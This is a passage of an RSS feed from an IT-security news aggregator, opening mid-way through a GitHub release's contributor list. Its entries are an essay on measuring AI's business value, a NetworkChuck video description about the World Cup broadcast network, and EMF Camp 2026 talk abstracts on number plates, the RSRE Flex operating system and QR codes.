data-octo-dimensions="link_type:self" href="https://github.com/HeLLGURD">@HeLLGURD</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hellno/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hellno">@hellno</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/herbalizer404/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/herbalizer404">@herbalizer404</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HexLab98/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HexLab98">@HexLab98</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hmirin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hmirin">@hmirin</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hopfensaft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hopfensaft">@Hopfensaft</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Hotragn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Hotragn">@Hotragn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hsy5571616/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hsy5571616">@hsy5571616</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/huanshan5195/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/huanshan5195">@huanshan5195</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/HumphreySun98/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/HumphreySun98">@HumphreySun98</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hwrdprkns/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hwrdprkns">@hwrdprkns</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hydracoco7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hydracoco7">@hydracoco7</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hydraxman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hydraxman">@hydraxman</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iamlukethedev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iamlukethedev">@iamlukethedev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iborazzi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iborazzi">@iborazzi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IgorGanapolsky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IgorGanapolsky">@IgorGanapolsky</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iizotov/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iizotov">@iizotov</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ildunari/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ildunari">@ildunari</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/infinitycrew39/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/infinitycrew39">@infinitycrew39</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/IpastorSan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/IpastorSan">@IpastorSan</a>, @irresi, @isfttr, @isheng-eqi, @itsflownium, @izumi0uu, @Jaaneek, @JacketPants,<br>
@jaisup, @jakelongvu-bot, @jakepresent, @jaketracey, @JAlmanzarMint, @JasonFang1993, @jbbottoms, @jcjc81,<br>
@JiaDe-Wu, @Jiahui-Gu, @Jigoooo, @jingsong-liu, @jneeee, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JoaoMarcos44/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JoaoMarcos44">@JoaoMarcos44</a>, @joelbrilliant, @John-Lussier, @jplew,<br>
@jtstothard, @juniperbevensee, @Jupiter363, @justinschille, @k4z4n0v4, @kaishi00, @karfly, @kartik-mem0,<br>
@kavioavio, @KCAYAAI, @kenyonxu, @keslerm, @kevinrajaram, @knoal, @kocaemre, @kohoj, @konsisumer, @krowd3v,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>, @kuangmi-bit, @kubolko, @kyssta-exe, @Kyzcreig, @l0h1nth, @labsobsidian, @laurinaitis,<br>
@LavyaTandel, @lawyer112, @lemonwan, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LeonSGP43/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LeonSGP43">@LeonSGP43</a>, @lEWFkRAD, @linfeng961, @liuhao1024, @liuwei666888, @ljy-2000,<br>
@loes5050, @logical-and, @LoicHmh, @loongfay, @lord-dubious, @lost9999, @lucasfdale, @lucaskvasirr,<br>
@luxuguang-leo, @ly-wang19, @m0n5t3r, @m1qaweb, @M1racleShih, @MaartenDMT, @mahdiwafy, @MaheshBhushan,<br>
@ManniBr, @marcelohildebrand, @marcolivierlavoie, @markoub, @MarkVLK, @Marxb85, @matantsevs,<br>
@maxpetrusenkoagent, @mbac, @mdc2122, @mguttmann, @Mibayy, @michaelHMK, @mijanx, @minchang, @momomojo,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MorAlekss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MorAlekss">@MorAlekss</a>, @morluto, @msh01, @mssteuer, @mvanhorn, @nanami7777777, @nankingjing, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/necoweb3/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/necoweb3">@necoweb3</a>, @neo-claw-bot,<br>
@neoguyverx, @nicha16, @nikshepsvn, @nima20002000, @nnnet, @NousResearch, @nullptr0807, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nv-kasikritc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nv-kasikritc">@nv-kasikritc</a>,<br>
@okisdev, @OmarB97, @ooiuuii, @ooovenenoso, @oppih, @Osraka, @ostravajih, @otsune, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>, @OYLFLMH,<br>
@patrick-muller, @pdmartins, @pedrommaiaa, @Peterskaronis, @petrichor-op, @pgregg88, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pierrenode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pierrenode">@pierrenode</a>, @pixel4039,<br>
@plcunha, @pnascimento9596, @Polyhistor, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PRATHAMESH75/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PRATHAMESH75">@PRATHAMESH75</a>, @professorpalmer, @Punyko8, @Que0x, @Qwinty,<br>
@r0gersm1th, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/r266-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/r266-tech">@r266-tech</a>, @rabadaki, @ragingbulld, @RainbowAndSun, @rainbowgore, @randimt, @rarf, @rasitakyol,<br>
@rayjun, @raymondyan-zhijie, @re-ITRT, @RenoMG, @Rival, @RKelln, @rlaehddus302, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>, @rodboev,<br>
@roryford, @rungmc357, @ruslanvasylev, @s0xn1ck, @s905060, @s96919, @sahibzada-allahyar, @sahil-shubham,<br>
@Sahil-SS9, @SahilRakhaiya05, @sam7894604, @SAMBAS123, @samrusani, @sanidhyasin, @sasquatch9818, @sberan,<br>
@ScotterMonk, @seagpt, @sebastianlutycz, @SemonCat, @setclock, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shannonsands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shannonsands">@shannonsands</a>, @sharziki, @shashwatgokhe,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>, @shuangxinniao, @SilentKnight87, @simplast, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/simpolism/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/simpolism">@simpolism</a>, @SiteupAgencia, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sjiangtao2024/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sjiangtao2024">@sjiangtao2024</a>, @sk-holmes,<br>
@slow4cyl, @smtony, @soddy022, @Soju06, @solyanviktor-star, @SongotenU, @spiky02plateau, @sprmn24, @SquabbyZ,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/srojk34/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/srojk34">@srojk34</a>, @ssiweifnag, @stantheman0128, @StellarisW, @stephenschoettler, @suninrain086, @superposition,<br>
@Supersynergy, @sweetcornna, @szafranski, @tanmayxchoudhary, @tarunravi, @tcconnally, @terry197913, @Thatgfsj,<br>
@thegoodguysla, @thestudionorth, @TheTom, @TinkerOfThings, @tjboudreaux, @tjp2021, @Tortugasaur, @Tosko4,<br>
@Tranquil-Flow, @trevorgordon981, @trismegistus-wanderer, @tt-a1i, @tuancookiez-hub, @TurgutKural, @Umi4Life,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/UnathiCodex/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/UnathiCodex">@UnathiCodex</a>, @unsupportedpastels, @uzaylisak, @valda, @vampyren, @veradim, @victor-kyriazakos, @virtualex-itv,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishal-dharm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishal-dharm">@vishal-dharm</a>, @Vissirexa, @vizi0uz, @vkkong, @vKongv, @VolodymyrBg, @vortexopenclaw, @VrtxOmega, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WadydX/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WadydX">@WadydX</a>,<br>
@waroffchange, @waseemshahwan, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/web3blind/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/web3blind">@web3blind</a>, @webtecnica, @wesleion, @wesleysimplicio, @williamumu,<br>
@WilsonKinyua, @wxy-nlp, @wyuebei-cloud, @x7peeps, @x9x9x9x9x9x91, @xuezhaolan, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxxigm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxxigm">@xxxigm</a>, @ya-nsh, @yatesjalex,<br>
@ygd58, @yingliang-zhang, @yinkev, @YLChen-007, @yu-xin-c, @yungchentang, @zapabob, @zccyman, @zeapsu,<br>
@ziliangpeng, @zwcf5200, @zzpigpinggai</p>
<p>Also: bo.fu, Paulo Henrique, kyssta-exe 25470058+kyssta-exe.fu, Paulo Henrique, kyssta-exe 25470058+kyssta-exe.</p>
<hr>
<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.7.1...v2026.7.20">v2026.7.1...v2026.7.20</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[With AI, activity is not value]]></title>
<description><![CDATA[The emergence of artificial intelligence is beginning to expose a profound weakness in the way modern enterprises measure performance.



For decades, business evaluation systems have been built around the logic of the industrial and transactional economy. Revenue growth, operating margins, earni...]]></description>
<link>https://tsecurity.de/de/3680938/it-security-nachrichten/with-ai-activity-is-not-value/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680938/it-security-nachrichten/with-ai-activity-is-not-value/</guid>
<pubDate>Mon, 20 Jul 2026 13:08:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The emergence of artificial intelligence is beginning to expose a profound weakness in the way modern enterprises measure performance.</p>



<p class="wp-block-paragraph"><a href="https://techeconomists.com/why-the-world-needs-new-economic-indicators/">For decades</a>, business evaluation systems have been built around the logic of the industrial and transactional economy. Revenue growth, operating margins, earnings per share, labor productivity, return on investment and market share became the dominant indicators of organizational success because they reflected the economic realities of a world in which value creation was primarily tied to physical production, labor efficiency, scale and later the automation of information processing. AI, however, is altering the very structure of enterprise value creation, and in doing so it is creating a widening separation between perceived future value and actual realized economic performance.</p>



<p class="wp-block-paragraph">Much of the current discussion <a href="https://howardarubin.substack.com/p/why-ai-roi-is-so-darn-hard-to-measure">surrounding AI performance measurement</a> reflects this tension. The overwhelming majority of AI-related metrics being celebrated today are not direct measures of realized enterprise outcomes. They are largely indicators of capability formation, market positioning, experimentation or investor signaling. Metrics such as AI spending levels, number of AI use cases, GPUs deployed, copilots implemented, models placed into production, AI hiring growth or agentic AI pilots all serve primarily as proxies for anticipated future advantage. These indicators may influence stock valuations, analyst sentiment and strategic narratives, but their relationship to measurable operational performance is often indirect, delayed or in some cases entirely speculative.</p>



<p class="wp-block-paragraph">This distinction is critically important because capital markets have historically rewarded the <em>expectation</em> of technological transformation long before actual economic results materialized. During previous technological revolutions—including electrification, enterprise resource planning, the internet, cloud computing and mobile platforms—valuation expansion frequently preceded measurable productivity gains by many years. The market priced future possibility before operational economics caught up. In many instances, investors rewarded firms simply for appearing strategically aligned with the dominant technological shift of the era. AI appears to be following a similar trajectory.</p>



<p class="wp-block-paragraph">The phenomenon resembles the famous <a href="https://www.brookings.edu/articles/the-solow-productivity-paradox-what-do-computers-do-to-productivity/">productivity paradox</a> articulated by economist Robert Solow, who observed that “you can see the computer age everywhere but in the productivity statistics.” AI today is visible everywhere: in investor presentations, earnings calls, technology conferences, product announcements and boardroom strategies. Yet in many industries, its measurable contribution to enterprise productivity, profitability or economic resilience remains difficult to isolate with precision. This does not necessarily mean AI lacks value. Rather, it reflects the reality that traditional accounting and performance systems were never designed to measure the forms of value AI increasingly produces.</p>



<p class="wp-block-paragraph">Artificial intelligence creates benefits that are often diffuse, cumulative and difficult to attribute directly to financial outcomes. AI may improve forecasting accuracy, reduce fraud, accelerate decision cycles, augment employee effectiveness, improve customer interactions, optimize logistics or enhance cybersecurity resilience. These benefits frequently manifest as second-order effects distributed across the enterprise rather than as immediately visible financial events. The causal chain between AI investment and realized business performance can therefore become extraordinarily difficult to quantify. A company may become operationally more intelligent without immediately becoming measurably more profitable.</p>



<p class="wp-block-paragraph">At the same time, AI introduces a profound danger: organizations may increasingly optimize for technological narrative rather than durable enterprise economics. Many firms today are pursuing AI primarily because markets reward the appearance of AI leadership. Investor enthusiasm, analyst pressure and competitive fear create incentives to demonstrate visible AI activity <a href="https://howardarubin.substack.com/p/talking-about-ai-value-is-like-talking">regardless of whether measurable economic value has actually been achieved</a>. In this environment, AI metrics can easily become instruments of valuation signaling rather than instruments of operational truth.</p>



<p class="wp-block-paragraph">This distinction between signaling and substance may become one of the defining economic challenges of the AI era. An organization may announce aggressive AI deployment programs, reduce headcount and report short-term margin improvements while simultaneously increasing hidden forms of technological fragility. Infrastructure costs may rise dramatically as GPU consumption, cloud usage, data engineering requirements and cybersecurity complexity expand. Technical debt may accelerate as AI-generated code proliferates without sufficient architectural discipline. Institutional knowledge may erode as organizations become excessively dependent on opaque models and automated systems. Long-term innovation capacity may weaken if enterprises divert disproportionate resources toward maintaining internally generated AI systems rather than building new strategic capabilities.</p>



<h2 class="wp-block-heading">What measuring AI value might actually look like</h2>



<p class="wp-block-paragraph">The distinction between AI activity and AI value becomes clearer when viewed through the kinds of measures organizations choose to track. Many enterprises today emphasize indicators such as the number of AI models deployed, copilots implemented, agents created, prompts executed, tokens consumed or employees using AI tools. These metrics demonstrate adoption and technological activity, but they reveal relatively little about whether AI is producing meaningful business outcomes.</p>



<p class="wp-block-paragraph">Measures of enterprise value look quite different. A manufacturer might evaluate whether AI improves demand forecasting accuracy enough to reduce inventory carrying costs or stockouts. A financial institution might measure whether AI meaningfully lowers fraud losses, accelerates loan processing or improves regulatory compliance. A healthcare provider could assess reductions in administrative burden, faster clinical decision support or improvements in patient throughput. In each case, the objective is not simply to measure AI deployment, but to determine whether AI creates measurable improvements in operational performance, economic outcomes or organizational resilience.</p>



<p class="wp-block-paragraph">Ultimately, organizations may need to ask a different question: not “How much AI are we using?” but “How much business value does each unit of AI investment create?” That shift—from measuring technological activity to measuring economic outcomes—may become one of the defining management disciplines of the AI era.</p>



<p class="wp-block-paragraph">Under traditional accounting frameworks, many of these deteriorations remain largely invisible. Quarterly earnings may improve even as underlying enterprise resilience declines. Stock prices may rise even as operational complexity becomes increasingly unsustainable. In this sense, the AI era threatens to widen the gap between financial appearance and organizational reality.</p>



<p class="wp-block-paragraph">This is why the future of enterprise measurement cannot simply involve adding AI metrics to existing financial scorecards. The challenge is far deeper. AI forces a reconsideration of what business performance actually means. Historically, enterprises were measured largely through static indicators of efficiency and output. Increasingly, however, competitive advantage may depend less on traditional efficiency and more on adaptive intelligence: the ability of an organization to learn faster, make better decisions, integrate human and machine capabilities effectively, manage technological complexity sustainably and convert computational power into durable economic outcomes.</p>



<p class="wp-block-paragraph">The most important future performance measures may therefore revolve around questions traditional accounting rarely addresses. How effectively does an enterprise convert technology investment into sustainable business capability? How economically efficient are its AI operations relative to the value they generate? How resilient is the organization to AI failure, cybersecurity disruption or infrastructure inflation? How successfully does it preserve and amplify human expertise rather than simply eliminate labor? How rapidly can it learn, adapt and operationalize new knowledge?</p>



<p class="wp-block-paragraph">These are not merely technology questions. They are questions of enterprise economics, organizational sustainability and long-term competitive viability.</p>



<p class="wp-block-paragraph">The companies that ultimately succeed in the AI era may not be those with the largest AI budgets, the greatest number of pilots or the most aggressive automation programs. They may instead be the firms that best understand the economics of technological capability itself: organizations capable of balancing innovation with resilience, automation with human augmentation and technological ambition with sustainable operational design.</p>



<p class="wp-block-paragraph">The coming decade is therefore likely to produce a widening divide between enterprises optimizing for AI-driven valuation narratives and enterprises optimizing for measurable, durable economic performance. In the short term, these may appear to be the same thing.</p>



<p class="wp-block-paragraph">Over time, however, the distinction will become increasingly visible. Some organizations will discover that AI has enhanced genuine enterprise capability. Others will discover that they merely optimized the appearance of transformation while silently accumulating new forms of economic and operational risk.</p>



<p class="wp-block-paragraph">Artificial intelligence is not simply changing business operations. It is exposing the inadequacy of many of the measures used to evaluate business success itself. The central challenge of the AI economy may ultimately become not whether organizations adopt AI, but whether they can distinguish between technological activity and actual economic value creation.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[this is where the World Cup is ACTUALLY made]]></title>
<description><![CDATA[Author: NetworkChuck - Bewertung: 201x - Views:1712 Build your next random idea on a Hostinger: https://hostinger.com/chuckfifa

I spent two days inside the FIFA World Cup International Broadcast Center (IBC), the temporary network that carries every camera, every replay, every goal from 16 stadi...]]></description>
<link>https://tsecurity.de/de/3679791/it-security-video/this-is-where-the-world-cup-is-actually-made/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679791/it-security-video/this-is-where-the-world-cup-is-actually-made/</guid>
<pubDate>Sun, 19 Jul 2026 19:38:24 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: NetworkChuck - Bewertung: 201x - Views:1712 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/LhnH0juUaGw?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Build your next random idea on a Hostinger: https://hostinger.com/chuckfifa<br />
<br />
I spent two days inside the FIFA World Cup International Broadcast Center (IBC), the temporary network that carries every camera, every replay, every goal from 16 stadiums, and the HBS team even handed me a packet capture of a real match. So we open it in Wireshark: uncompressed ST 2110 video, 150,000 multicast flows, and a failover trick that will make any network engineer smile.<br />
<br />
🎓 I asked the crew HOURS of questions that didn't fit in this video, the full behind-the-scenes interviews are on NetworkChuck Academy: https://ntck-ac.co/fifa?utm_source=youtube&utm_medium=video&utm_campaign=fifa_world_cup_2026&utm_content=fifa_main_tour<br />
<br />
 <br />
<br />
<br />
<br />
RESOURCES / LINKS:<br />
🎮 Play the Backrooms of the IBC (built on a Hostinger VPS with a Hermes agent): https://srv732026.hstgr.cloud<br />
📚 THE SIGNAL — the World Cup networking comic I made for my kids: https://srv732026.hstgr.cloud/comic/<br />
🛠️ Wireshark (decode packets yourself): https://www.wireshark.org<br />
🌐 Official IBC Tours site: https://ibctours.tv<br />
📺 The Hermes video (the AI agent that built the game): https://www.youtube.com/watch?v=QQEgIo4Juxg<br />
<br />
TIMESTAMPS:<br />
0:00 - The World Cup is made in Dallas<br />
1:29 - Following one match: Boston → the IBC → the world<br />
3:06 - How a match gets "made" 1,500 miles from the stadium<br />
4:32 - The fiber (and the red/blue trick)<br />
7:08 - Multicast Martin and 150,000 flows<br />
11:52 - The thing I built at 1AM on a Hostinger VPS<br />
14:10 - The people who make the World Cup<br />
16:07 - Decoding a REAL World Cup match in Wireshark<br />
21:45 - Addie's question: the sound of the ball<br />
23:20 - The stadium, the backup plan, and the teardown<br />
29:30 - A prayer for the stressed<br />
<br />
FEATURING (huge thanks to the crew who make the World Cup — and this video — possible):<br />
👤 Christoph Barbet — Head of Broadcast Infrastructure, HBS (Host Broadcast Services)<br />
👤 "Multicast Martin" — broadcast SDN / TFC<br />
👤 Alex — Master Control Room Supervisor<br />
👤 Wolfgang Herman — IBC Communications Engineer<br />
👤 Mick — Audio Listener<br />
👤 Anthony & Colin — Layer 1 / Broadcast Support<br />
👤 Steve — Control Systems & Dashboards<br />
👤 Gavin — Stadium Manager, AT&T Stadium<br />
<br />
**Sponsored by Hostinger<br />
<br />
SUPPORT NETWORKCHUCK:<br />
☕☕ COFFEE and MERCH: https://ntck.co/coffee<br />
<br />
READY TO LEARN??<br />
🔥🔥Join the NetworkChuck Academy!: https://ntck.co/NCAcademy<br />
📚 CCNA Course: https://ntck.co/ccna<br />
<br />
FOLLOW ME EVERYWHERE:<br />
Instagram: https://www.instagram.com/networkchuck/<br />
X/Twitter: https://x.com/networkchuck<br />
Facebook: https://www.facebook.com/NetworkChuck/<br />
Join the Discord server: https://ntck.co/discord<br />
<br />
Some links in this description are affiliate links. If you buy through them, I may earn a small commission at no extra cost to you. #sponsored<br />
<br />
#worldcup #networking #networkchuck<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What's in a number plate? (emf2026)]]></title>
<description><![CDATA[Why are Irish number plates so much longer than British ones, despite the population being much smaller? What letters can you use on a Greek number plate? How do you drive a Japanese-registered car abroad, when the number plate is full of kanji and kana? Why do some people give Belgian cars with ...]]></description>
<link>https://tsecurity.de/de/3679530/it-security-video/whats-in-a-number-plate-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679530/it-security-video/whats-in-a-number-plate-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 15:33:07 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Why are Irish number plates so much longer than British ones, despite the population being much smaller? What letters can you use on a Greek number plate? How do you drive a Japanese-registered car abroad, when the number plate is full of kanji and kana? Why do some people give Belgian cars with five-character plates a wide berth? Are those supercars with Arabic number plates you see in West London even legal?

I've always been a bit obsessed with vehicle registration plates. I like spotting the hidden information in them, but I also like seeing the decisions encoded in their formats, and how those have played out over time. Everywhere seems to have come up with its own solution to the same problem, they're all different, and seemingly innocuous decisions can have significant impacts later on.

These superficially trivial identifiers turn out to be much more than that, intersecting design, politics, information encoding, and even questions of identity. They're also, I hope to show, fun, and can make us all feel better about having to live with the consequences of bad choices we made in the past.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/48-whats-in-a-number-plate]]></content:encoded>
</item>
<item>
<title><![CDATA[RSRE Flex: reviving an innovative, remarkably odd British operating system that almost nobody knows about (emf2026)]]></title>
<description><![CDATA[1980: Royal Signals and Radar Establishment researchers realise Flex, a mould-breaking, comprehensively alternative vision of computing. Features:

- All-hypertext interface (oddly never described thus)
- Allusions to ancient Egyptian orthography
- Unforgeable pointers for security
- Write-once f...]]></description>
<link>https://tsecurity.de/de/3679393/it-security-video/rsre-flex-reviving-an-innovative-remarkably-odd-british-operating-system-that-almost-nobody-knows-about-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679393/it-security-video/rsre-flex-reviving-an-innovative-remarkably-odd-british-operating-system-that-almost-nobody-knows-about-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 13:17:59 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[1980: Royal Signals and Radar Establishment researchers realise Flex, a mould-breaking, comprehensively alternative vision of computing. Features:

- All-hypertext interface (oddly never described thus)
- Allusions to ancient Egyptian orthography
- Unforgeable pointers for security
- Write-once filesystem with nameless files (which you didn't mind)
- Implementation in the (infamously) complicated language Algol 68
- First-class functions and typechecking everywhere (I'll explain what that means)
- Memorable... hardware choices

Today: Flex runs again for the first time in (probably) decades! In this spirited talk (for general audiences *and* OS geeks) I'll live-demo its unique &quot;feel&quot; while describing its origins, fate, and unlikely revival (hint: mouldy 8&quot; floppies). I'll also call for help: maybe YOU know people and information needed to share it publicly. Ahead of its time, maybe ours too, or maybe outside of it: everyone should be able to try Flex. Hopefully this talk brings us one step closer!

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/91-rsre-flex-reviving-an-innovative]]></content:encoded>
</item>
<item>
<title><![CDATA[What's in a number plate? (emf2026)]]></title>
<description><![CDATA[Why are Irish number plates so much longer than British ones, despite the population being much smaller? What letters can you use on a Greek number plate? How do you drive a Japanese-registered car abroad, when the number plate is full of kanji and kana? Why do some people give Belgian cars with ...]]></description>
<link>https://tsecurity.de/de/3679362/it-security-video/whats-in-a-number-plate-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679362/it-security-video/whats-in-a-number-plate-emf2026/</guid>
<pubDate>Sun, 19 Jul 2026 13:03:36 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Why are Irish number plates so much longer than British ones, despite the population being much smaller? What letters can you use on a Greek number plate? How do you drive a Japanese-registered car abroad, when the number plate is full of kanji and kana? Why do some people give Belgian cars with five-character plates a wide berth? Are those supercars with Arabic number plates you see in West London even legal?

I've always been a bit obsessed with vehicle registration plates. I like spotting the hidden information in them, but I also like seeing the decisions encoded in their formats, and how those have played out over time. Everywhere seems to have come up with its own solution to the same problem, they're all different, and seemingly innocuous decisions can have significant impacts later on.

These superficially trivial identifiers turn out to be much more than that, intersecting design, politics, information encoding, and even questions of identity. They're also, I hope to show, fun, and can make us all feel better about having to live with the consequences of bad choices we made in the past.

Licensed to the public under https://creativecommons.org/licenses/by-sa/4.0/
about this event: https://www.emfcamp.org/schedule/2026/48-whats-in-a-number-plate]]></content:encoded>
</item>
<item>
<title><![CDATA[A Brief History of the QR Code, and other scannable things (emf2026)]]></title>
<description><![CDATA[QR Codes! They're everywhere, and after this talk you'll see them everywhere. They've invaded every part of modern life - but how did they get there? (Have they always been here, in secret?)

This talk will cover the history of scanning things that contain information such as the barcode, coverin...]]></description>
<link>https://tsecurity.de/de/3678593/it-security-video/a-brief-history-of-the-qr-code-and-other-scannable-things-emf2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678593/it-security-video/a-brief-history-of-the-qr-code-and-other-scannable-things-emf2026/</guid>
